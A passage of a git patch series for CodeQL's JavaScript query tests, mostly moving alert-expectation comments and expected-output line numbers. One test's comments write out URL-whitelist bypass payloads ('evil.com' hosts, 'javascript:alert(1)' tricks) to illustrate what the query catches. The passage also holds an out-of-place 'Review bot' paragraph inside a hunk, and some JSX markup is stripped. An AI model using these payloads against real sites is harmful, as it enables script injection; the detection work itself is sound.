diff --git a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js index a629ae06320d..edba36470508 100644 --- a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js +++ b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js @@ -67,7 +67,7 @@ async function awaitFlow(){ (function() { function f1(x) { - x || y // $ Alert - but whitelisted + x || y // OK } f1(true); @@ -79,7 +79,7 @@ async function awaitFlow(){ function f3(x) { (function(){ - x || y // $ Alert - but whitelisted + x || y // OK }); } f3(true); @@ -150,7 +150,7 @@ async function awaitFlow(){ var v = p(); if (v) { // $ Alert } - if (v) { // $ Alert - but not detected due to SSA limitations + if (v) { // $ MISSING: Alert - due to SSA limitations } }); @@ -165,7 +165,7 @@ async function awaitFlow(){ var v = findOrThrow(); if (v) { // $ Alert } - if (v) { // $ Alert - but not detected due to SSA limitations + if (v) { // $ MISSING: Alert - due to SSA limitations } }); @@ -180,7 +180,7 @@ async function awaitFlow(){ (function() { function outer(x) { addEventListener("click", () => { - if (!x && something()) { // $ Alert - but whitelisted + if (!x && something()) { // OK something(); } }); From 7623ebb13bf67dcd925881a0344f6a5d69d8fa24 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 17:01:07 +0100 Subject: [PATCH 079/115] JS: Accept changes in UseOfReturnlessFunction --- .../query-tests/Statements/UseOfReturnlessFunction/tst.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js index 7f4296932d96..37da0c7e2a6a 100644 --- a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js 
+++ b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js @@ -21,7 +21,7 @@ var a = Math.random() > 0.5 ? returnsValue() : onlySideEffects(); // OK - A is never used. - var b = onlySideEffects(); + var b = onlySideEffects(); // $ Alert console.log(b); var c = 42 + (onlySideEffects(), 42); // OK - value is thrown away. @@ -42,7 +42,7 @@ onlySideEffects: onlySideEffects } - var e = myObj.onlySideEffects.apply(this, arguments); // $ Alert + var e = myObj.onlySideEffects.apply(this, arguments); // $ MISSING: Alert console.log(e); function onlySideEffects2() { From 6cf1334c6d6df6149aca85d5945983af69377c12 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 08:59:27 +0100 Subject: [PATCH 080/115] Fix comment style in UnboundEventHandlerReceiver --- .../Expressions/UnboundEventHandlerReceiver/tst.js | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js b/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js index e129865af56f..f6039b673435 100644 --- a/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js +++ b/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js @@ -24,9 +24,9 @@ class Component1 extends React.Component { render() { var unbound3 = this.unbound3; return
-
// $ Alert -
// $ Alert -
// $ Alert +
{ /* $ Alert */ } +
{ /* $ Alert */ } +
{ /* $ Alert */ }
From 2b33ed367167bb4f91d160c8642f269ed06e47f3 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 11:17:03 +0100 Subject: [PATCH 081/115] JS: Remove incorrect alert marker --- .../Electron/NodeIntegration/EnablingNodeIntegration.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js index b5a8481305e9..5e8bc71a92ff 100644 --- a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js +++ b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js @@ -34,7 +34,7 @@ function test() { minHeight: 300 }; - var safe_used = { // $ Alert - explicitly disabled + var safe_used = { // explicitly disabled webPreferences: { nodeIntegration: false, plugins: true, From a1c13f02be912a59eeaf5b61120436ecb20dc20c Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 11:19:27 +0100 Subject: [PATCH 082/115] JS: Remove alert marker that's reported on another line We had two 'NOT OK' comments for the same alert. The alert appears on the 'pref' object above. --- .../Electron/NodeIntegration/EnablingNodeIntegration.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js index 5e8bc71a92ff..e002845d7995 100644 --- a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js +++ b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js @@ -26,7 +26,7 @@ function test() { sandbox: true }; // $ Alert - var options_2 = { // $ Alert - implicitly enabled + var options_2 = { webPreferences: pref, show: true, frame: true, From dc28bb527bbe2852dfd702e0bf65b4684a02436e Mon Sep 17 00:00:00 2001 
From: Asger F Date: Wed, 26 Feb 2025 11:21:41 +0100 Subject: [PATCH 083/115] JS: Fix alert location and use RelatedLocation in InsecureUrlWhitelist --- .../AngularJS/InsecureUrlWhitelist/tst.js | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js index 6ede37fed7cc..1ee742c6d6a2 100644 --- a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js +++ b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js @@ -1,11 +1,11 @@ angular.module('myApp', []) .config(function($sceDelegateProvider) { $sceDelegateProvider.resourceUrlWhitelist([ - "**://example.com/*", // $ Alert - (exploit: http://evil.com/?ignore=://example.org/a or javascript:alert(1);://example.org/a) - "*://example.org/*", // $ Alert - (exploit: javascript://example.org/a%0A%0Dalert(1) using a linebreak to end the comment starting with "//"!) - "https://**.example.com/*", // $ Alert - exploit: https://evil.com/?ignore=://example.com/a - "https://example.**", // $ Alert - exploit: https://example.evil.com or http://example.:foo@evil.com - "https://example.*", // $ Alert - exploit: https://example.UnexpectedTLD + "**://example.com/*", // $ RelatedLocation - (exploit: http://evil.com/?ignore=://example.org/a or javascript:alert(1);://example.org/a) + "*://example.org/*", // $ RelatedLocation - (exploit: javascript://example.org/a%0A%0Dalert(1) using a linebreak to end the comment starting with "//"!) + "https://**.example.com/*", // $ RelatedLocation - exploit: https://evil.com/?ignore=://example.com/a + "https://example.**", // $ RelatedLocation - exploit: https://example.evil.com or http://example.:foo@evil.com + "https://example.*", // $ RelatedLocation - exploit: https://example.UnexpectedTLD "https://example.com", "https://example.com/**", 
@@ -19,6 +19,6 @@ angular.module('myApp', []) "https://*.example.com", // not flagged: - /http:\/\/www.example.org/g // $ Alert - (exploit http://wwwaexample.org (dots are not escaped)) - ]); + /http:\/\/www.example.org/g // $ MISSING: RelatedLocation - (exploit http://wwwaexample.org (dots are not escaped)) + ]); // $ Alert }); From 605999454acf161f3056967f5e00d4b9d5d95e17 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 12:52:06 +0100 Subject: [PATCH 084/115] JS: Accept more results in SpuriousArguments --- .../LanguageFeatures/SpuriousArguments/reflection.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js index 41f312bd0791..ac2df0dafdce 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js @@ -4,7 +4,7 @@ function f1(x) {return;} f0.call(); f0.call(this); f0.call(this, 1); // $ Alert -f0.call(this, 1, 2); +f0.call(this, 1, 2); // $ Alert f1.call(); f1.call(this); From 87ed86e4fdb3e8af624a9ad7c27a8be9462550ab Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 11 Feb 2025 17:12:53 +0100 Subject: [PATCH 085/115] JS: Update UnusedOrUndefinedStateProperty Using RelatedLocations to add clarity --- .../Expressions/ImplicitOperandConversion/tst.js | 2 +- .../test/query-tests/Expressions/MissingAwait/tst.js | 2 +- .../Expressions/SuspiciousInvocation/eval.js | 2 +- .../LanguageFeatures/IllegalInvocation/tst.js | 4 ++-- .../React/UnusedOrUndefinedStateProperty/issue7506.js | 4 ++-- .../React/UnusedOrUndefinedStateProperty/undefined.js | 10 +++++----- .../React/UnusedOrUndefinedStateProperty/unused.js | 10 +++++----- 7 files changed, 17 insertions(+), 17 deletions(-) 
diff --git a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js index fe1e7d6924b0..a72dc333dac5 100644 --- a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js +++ b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js @@ -74,7 +74,7 @@ function l() { x ** 2; // $ Alert } -1n + 1; // $ MISSED: Alert +1n + 1; // $ MISSING: Alert (function(){ let sum = 0; diff --git a/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js b/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js index 28e95513d401..61f599a6c33d 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js +++ b/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js @@ -59,7 +59,7 @@ function useThingPossiblySync(b) { if (thing == null) {} - return thing + "bar"; // $ MISSED: Alert + return thing + "bar"; // $ MISSING: Alert } function useThingInVoid() { diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js index 2cf1e74a33eb..db14aca9ea65 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js @@ -6,7 +6,7 @@ function foo() { function bar() { var g; - g(); // $ MISSED: Alert + g(); // $ MISSING: Alert eval("g = alert"); } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js index 1ffb7a489c8e..48af86687794 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js 
@@ -12,7 +12,7 @@ let c = new C(); C(); // $ Alert new (x=>x); // $ Alert c.m(); -new c.m(); // $ MISSED: Alert +new c.m(); // $ MISSING: Alert var o = { f: function() {}, @@ -21,7 +21,7 @@ var o = { o.f(); new o.f(); o.g(); -new o.g(); // $ MISSED: Alert +new o.g(); // $ MISSING: Alert function f(b) { var g; diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js index f5acdc8d99ab..07932d220d65 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js @@ -9,10 +9,10 @@ class C1 extends React.Component { } } -class C2 extends React.Component { +class C2 extends React.Component { // $ Alert state = { - p1: '' + p1: '' // $ RelatedLocation } static getDerivedStateFromProps_unmodeled(props, state) { diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js index afc4f61b083c..96ffb02f8b0b 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js @@ -1,12 +1,12 @@ -class C1 extends React.Component { +class C1 extends React.Component { // $ Alert constructor() { this.state.writtenDirectly = 42; this.setState({ writtenInSetState: 42 }); this.state.writtenInOtherMethod; - this.state.notWritten; // $ Alert - this.state.notWrittenButReadInChain; // $ Alert + this.state.notWritten; // $ RelatedLocation + this.state.notWrittenButReadInChain; // $ RelatedLocation this.state.writtenDirectly; this.state.writtenInSetState; 
@@ -29,10 +29,10 @@ class C2 extends React.Component { } -class C3 extends React.Component { +class C3 extends React.Component { // $ Alert constructor() { this.state.writtenThrougExternalPropertyAccess; - this.state.notWrittenThrougExternalPropertyAccess; // $ Alert + this.state.notWrittenThrougExternalPropertyAccess; // $ RelatedLocation } } diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js index d2ff35967673..9c4e5441167a 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js @@ -1,9 +1,9 @@ -class C1 extends React.Component { +class C1 extends React.Component { // $ Alert constructor() { this.state.readDirectly = 42; this.state.readInChain = {}; this.state.readInOtherMethod = {}; - this.state.notRead = 42; // $ Alert + this.state.notRead = 42; // $ RelatedLocation this.state.readDirectly; this.state.readInChain.foo; } @@ -18,16 +18,16 @@ function f(s){ } class C2 extends React.Component { constructor() { - this.state.readWhenEscaped = 42; // $ Alert + this.state.readWhenEscaped = 42; // $ MISSING: Alert f(this.state); } } -class C3 extends React.Component { +class C3 extends React.Component { // $ Alert constructor() { this.state.readThrougExternaPropertyAccess = 42; - this.state.notReadThrougExternaPropertyAccess = 42; // $ Alert + this.state.notReadThrougExternaPropertyAccess = 42; // $ RelatedLocation } } From 8ef51c495fd22fab4ff2315944151073830d4888 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:02:24 +0100 Subject: [PATCH 086/115] JS: Fix wrong expectation in UnusedOrUndefinedStateProperty --- .../query-tests/React/UnusedOrUndefinedStateProperty/unused.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js index 9c4e5441167a..60673a23b620 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js @@ -18,7 +18,7 @@ function f(s){ } class C2 extends React.Component { constructor() { - this.state.readWhenEscaped = 42; // $ MISSING: Alert + this.state.readWhenEscaped = 42; f(this.state); } } From aade1e863d82329042550215a83ed3e53f392e6b Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:02:38 +0100 Subject: [PATCH 087/115] JS: Add a related location in UnusedOrUndefinedStateProperty --- .../React/UnusedOrUndefinedStateProperty/undefined.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js index 96ffb02f8b0b..165ab793ac71 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js @@ -61,7 +61,7 @@ new C5({writtenInUnknownInitializerObject: 42}); React.createClass({ // $ Alert render: function() { this.state.writtenInKnownInitializerObject; - this.state.notWrittenInKnownInitializerObject; + this.state.notWrittenInKnownInitializerObject; // $ RelatedLocation return
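Review bot: Dropping the `MISSING: Alert` tag from `this.state.readWhenEscaped = 42;` is correct, because `f(this.state)` on the following line lets the state object escape through a call, so the query can no longer prove the property is unread; but the line now carries neither a tag nor an explanation, and the property name only hints at why it is intentionally unflagged. The test files in this series document deliberately unflagged code with an `OK - …` comment (e.g. `// OK - ensures files cannot be accessed outside of root folder` in tainted-sendFile.js), and `this.state.readWhenEscaped = 42; // OK - state escapes via f(this.state)` would do the same here. Class `C2` is shown in full within the hunk.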
; }, getInitialState: function() { From 0496de6c8f9c561182cb0b46fa3ee3ac19c0183d Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:05:29 +0100 Subject: [PATCH 088/115] JS: Accept alerts in UselessCharacterEscape --- .../UselessCharacterEscape/tst-escapes.js | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js index 3df355052a55..f776c9d40e68 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js @@ -10,12 +10,12 @@ RegExp("{}\"|<>?"); RegExp(" "); // backslashes -RegExp("\a\b\c\d\e\f\g\h\i\j\k\l\m\n\o\p\q\r\s\t\\u\v\\x\y\z"); -RegExp("\A\B\C\D\E\F\G\H\I\J\K\L\M\N\O\P\Q\R\S\T\U\V\X\Y\Z"); -RegExp("\`\1\2\3\4\5\6\7\8\9\0\-\="); +RegExp("\a\b\c\d\e\f\g\h\i\j\k\l\m\n\o\p\q\r\s\t\\u\v\\x\y\z"); // $ Alert +RegExp("\A\B\C\D\E\F\G\H\I\J\K\L\M\N\O\P\Q\R\S\T\U\V\X\Y\Z"); // $ Alert +RegExp("\`\1\2\3\4\5\6\7\8\9\0\-\="); // $ Alert RegExp("\~\!\@\#\$\%\^\&\*\(\)\_\+"); // $ Alert RegExp("\[\]\'\\,\.\/"); // $ Alert -RegExp("\{\}\\\"\|\<\>\?"); +RegExp("\{\}\\\"\|\<\>\?"); // $ Alert RegExp("\ "); /\a\b\c\d\e\f\g\h\i\j\k\l\m\n\o\p\q\r\s\t\u\v\\x\y\z"/; /\A\B\C\D\E\F\G\H\I\J\K\L\M\N\O\P\Q\R\S\T\U\V\X\Y\Z/; 
@@ -57,17 +57,17 @@ RegExp("[\.]"); // $ Alert RegExp("a[b\.c]d"); // $ Alert RegExp("\b"); RegExp(`\b`); -RegExp(`\k\\k\d\\d`) -RegExp(`\k\\k${foo}\d\\d`) +RegExp(`\k\\k\d\\d`) // $ Alert +RegExp(`\k\\k${foo}\d\\d`) // $ Alert // effective escapes -RegExp("\]") +RegExp("\]") // $ Alert RegExp("\\]") RegExp("\\\]"); // effectively escaped after all RegExp("x\\\]"); // effectively escaped after all RegExp("\\\\]") -RegExp("\\\\\]") +RegExp("\\\\\]") // $ Alert RegExp("\\\\\\]") RegExp("\\\\\\\]") // effectively escaped after all RegExp("\\\\\\\\]") -RegExp("\\\\\\\\\]") +RegExp("\\\\\\\\\]") // $ Alert From bb67a0e9b09175c4a56fb1bd0ec40ccfdc46685e Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:05:53 +0100 Subject: [PATCH 089/115] JS: Remove outdated comment --- .../UselessCharacterEscape.expected | 118 +++++++++--------- .../UselessCharacterEscape/tst-escapes.js | 2 - 2 files changed, 59 insertions(+), 61 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected index 6cd6e27b0edc..b3c764e85cbf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected +++ b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected 
@@ -1,59 +1,59 @@ -| tst-escapes.js:19:8:19:11 | "\\ " | The escape sequence '\\ ' is equivalent to just ' '. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\e' is equivalent to just 'e'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\g' is equivalent to just 'g'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\h' is equivalent to just 'h'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\i' is equivalent to just 'i'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\j' is equivalent to just 'j'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\l' is equivalent to just 'l'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\m' is equivalent to just 'm'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\o' is equivalent to just 'o'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\q' is equivalent to just 'q'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\y' is equivalent to just 'y'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\z' is equivalent to just 'z'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\A' is equivalent to just 'A'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\C' is equivalent to just 'C'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\E' is equivalent to just 'E'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\F' is equivalent to just 'F'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... 
\\X\\Y\\Z/ | The escape sequence '\\G' is equivalent to just 'G'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\H' is equivalent to just 'H'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\I' is equivalent to just 'I'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\J' is equivalent to just 'J'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\K' is equivalent to just 'K'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\L' is equivalent to just 'L'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\M' is equivalent to just 'M'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\N' is equivalent to just 'N'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\O' is equivalent to just 'O'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Q' is equivalent to just 'Q'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\R' is equivalent to just 'R'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\T' is equivalent to just 'T'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\U' is equivalent to just 'U'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\V' is equivalent to just 'V'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\X' is equivalent to just 'X'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Y' is equivalent to just 'Y'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Z' is equivalent to just 'Z'. | -| tst-escapes.js:22:1:22:28 | /\\`\\1\\2 ... 
\\0\\-\\=/ | The escape sequence '\\=' is equivalent to just '='. | -| tst-escapes.js:22:1:22:28 | /\\`\\1\\2 ... \\0\\-\\=/ | The escape sequence '\\`' is equivalent to just '`'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\!' is equivalent to just '!'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\#' is equivalent to just '#'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\%' is equivalent to just '%'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\&' is equivalent to just '&'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\@' is equivalent to just '@'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\_' is equivalent to just '_'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\~' is equivalent to just '~'. | -| tst-escapes.js:24:1:24:15 | /\\[\\]\\'\\\\,\\.\\// | The escape sequence '\\'' is equivalent to just '''. | -| tst-escapes.js:25:1:25:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\"' is equivalent to just '"'. | -| tst-escapes.js:25:1:25:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\<' is equivalent to just '<'. | -| tst-escapes.js:25:1:25:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\>' is equivalent to just '>'. | -| tst-escapes.js:26:1:26:4 | /\\ / | The escape sequence '\\ ' is equivalent to just ' '. | -| tst-escapes.js:29:8:29:11 | "\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:31:8:31:13 | "\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:33:8:33:15 | "\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:35:8:35:17 | "\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. 
| -| tst-escapes.js:37:8:37:19 | "\\\\\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:42:1:42:4 | "\\." | The escape sequence '\\.' is equivalent to just '.'. | -| tst-escapes.js:48:8:48:15 | "'\\'\\\\'" | The escape sequence '\\'' is equivalent to just '''. | -| tst-escapes.js:50:8:50:15 | '"\\"\\\\"' | The escape sequence '\\"' is equivalent to just '"'. | -| tst-escapes.js:66:8:66:13 | "\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | -| tst-escapes.js:67:8:67:14 | "x\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | -| tst-escapes.js:71:8:71:17 | "\\\\\\\\\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | +| tst-escapes.js:17:8:17:11 | "\\ " | The escape sequence '\\ ' is equivalent to just ' '. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\e' is equivalent to just 'e'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\g' is equivalent to just 'g'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\h' is equivalent to just 'h'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\i' is equivalent to just 'i'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\j' is equivalent to just 'j'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\l' is equivalent to just 'l'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\m' is equivalent to just 'm'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\o' is equivalent to just 'o'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\q' is equivalent to just 'q'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... 
